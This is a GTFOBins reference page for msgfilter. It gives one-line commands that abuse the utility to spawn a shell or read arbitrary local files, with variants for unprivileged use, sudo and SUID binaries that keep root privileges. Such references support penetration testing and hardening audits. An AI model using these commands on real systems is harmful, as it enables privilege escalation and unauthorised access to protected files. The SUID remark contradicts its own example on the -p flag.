msgfilter | GTFOBins

.. / msgfilter

Sponsor Fork Star

Shell

This executable can spawn an interactive system shell.

Comment

The kill command is needed to spawn the shell only once. Instead of readinf from standard input, it can read files passed via the -i option.

Unprivileged

This function can be performed by any unprivileged user.

echo x | msgfilter -P /bin/sh -c '/bin/sh 0<&2 1>&2; kill $PPID'

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

echo x | msgfilter -P /bin/sh -c '/bin/sh 0<&2 1>&2; kill $PPID'

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

Remarks

This executable runs commands directly, e.g., via functions like exec, remember to omit the -p argument of every /bin/sh invocation for distributions where the default shell does not drop SUID privileges.

echo x | msgfilter -P /bin/sh -p -c '/bin/sh -p 0<&2 1>&2; kill $PPID'

File read

This executable can read data from local files.

Comment

The file is parsed and displayed as a Java .properties file. /bin/cat can be replaced with any other filter program.

Unprivileged

This function can be performed by any unprivileged user.

msgfilter -P -i /path/to/input-file /bin/cat

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

msgfilter -P -i /path/to/input-file /bin/cat

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

msgfilter -P -i /path/to/input-file /bin/cat

Remarks

The content is corrupted or otherwise altered by the process, thus it might not be suitable for handling arbitrary binary data.